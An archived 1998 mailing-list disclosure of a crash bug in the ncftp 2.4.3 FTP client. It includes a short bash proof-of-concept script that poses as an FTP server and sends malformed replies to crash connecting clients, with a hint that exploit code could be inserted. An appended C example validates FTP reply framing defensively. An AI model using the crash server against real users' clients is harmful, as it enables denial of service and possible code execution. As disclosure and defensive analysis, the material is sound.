ncftp 2.4.3 bug

From: Paul Boehm (paulat_private)
Date: Sat Jun 20 1998 - 15:52:33 PDT

    Hi,
    
    i think i've found a bug in ncftp 2.4.3 (latest stable release)...
    if you connect to an ftp server that responds with something like the
    shit below, ncftp2.4.3 segfaults. i think this is exploitable,
    but had no time/motivation to look further into it.
    
    probably this isn't very dangerous anyway cause
    your victim needs to connect willingly, and using ncftp to your server..
    that won't happen very often unless
    you've been talking with your victim before.
    
    anyway i thought it may be a good idea to post it, so here it is:
    
    --snip-- ncftpcrashd.sh
    #!/bin/bash
    # ncftp2.4.3 crash by infectedat_private
    #   Start this using inetd. (port 21)
    
    echo "331 hi, barbie.. wanna crash with me?"
    echo "230 sure ken!"
    echo "then hop in"
    --snip--
    
    every reply that looks like this works:
    331 a
    230 b
    c[putting here some exploit code may work]
    
    bye,
        paul
    
    PS: i have no clue why this crashes ncftp... i haven't looked through
        ncftp's source, but maybe someone else will.
    
    --
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Name: Paul S. Boehm               ||  Freelance Security Consulter.
        Email: paulat_private  ||  PGPkey available at:
           Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    There is no reason for any individual to have a computer in their home.
                  --Ken Olsen (Digital Corp CEO) 1977.
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
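
Added example (not part of the original post and not ncftp's code): a client-side check of FTP reply framing, run over the three lines from the post. It assumes RFC 959 framing, where a reply line starts with a three-digit code followed by a space or hyphen and free text is only valid inside a "NNN-" multi-line reply; the names and the 512-byte line cap are hypothetical. The post does not identify the cause of the crash and this example does not claim to.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

#define FTP_LINE_MAX 512 /* assumed per-line cap, not a value from the post */
enum ftp_status { FTP_NEED_MORE, FTP_REPLY_DONE, FTP_PROTOCOL_ERROR };
struct ftp_reply { int code; int multiline; }; /* zero-initialise before use */

/* Feed one reply line (CRLF already stripped) into the framing state machine. */
enum ftp_status ftp_feed_line(struct ftp_reply *r, const char *line)
{
    size_t len;
    int code = -1, sep = 0;
    for (len = 0; line[len] != '\0'; len++)
        if (len == FTP_LINE_MAX)
            return FTP_PROTOCOL_ERROR;      /* oversized line: refuse, never copy */
    if (len >= 3 && isdigit((unsigned char)line[0]) &&
        isdigit((unsigned char)line[1]) && isdigit((unsigned char)line[2])) {
        code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
        sep = (len > 3) ? line[3] : ' ';    /* a bare "NNN" counts as final */
    }
    if (r->multiline) {                     /* inside "NNN-" ... "NNN " */
        r->multiline = !(code == r->code && sep == ' ');
        return r->multiline ? FTP_NEED_MORE : FTP_REPLY_DONE;
    }
    if (code < 100 || code > 599 || (sep != ' ' && sep != '-'))
        return FTP_PROTOCOL_ERROR;          /* text with no reply code */
    r->code = code;
    r->multiline = (sep == '-');
    return r->multiline ? FTP_NEED_MORE : FTP_REPLY_DONE;
}

/* Index of the first line that breaks reply framing, or -1 if all are valid. */
int ftp_first_bad_line(const char *const *lines, size_t n)
{
    struct ftp_reply r = {0, 0};
    for (size_t i = 0; i < n; i++)
        if (ftp_feed_line(&r, lines[i]) == FTP_PROTOCOL_ERROR)
            return (int)i;
    return -1;
}

/* The three lines from the post, then a constructed well-formed multi-line reply. */
static const char *const post_lines[] = { "331 hi, barbie.. wanna crash with me?", "230 sure ken!", "then hop in" };
static const char *const ok_lines[] = { "230-sure ken!", "then hop in", "230 done" };
int main(void)
{
    printf("post: %d, ok: %d\n", ftp_first_bad_line(post_lines, 3), ftp_first_bad_line(ok_lines, 3));
    return 0;
}
```

The third line of the post's sequence is reported as a framing violation, while the same text inside a "230-" ... "230 " block is accepted as continuation text.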
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:04 PDT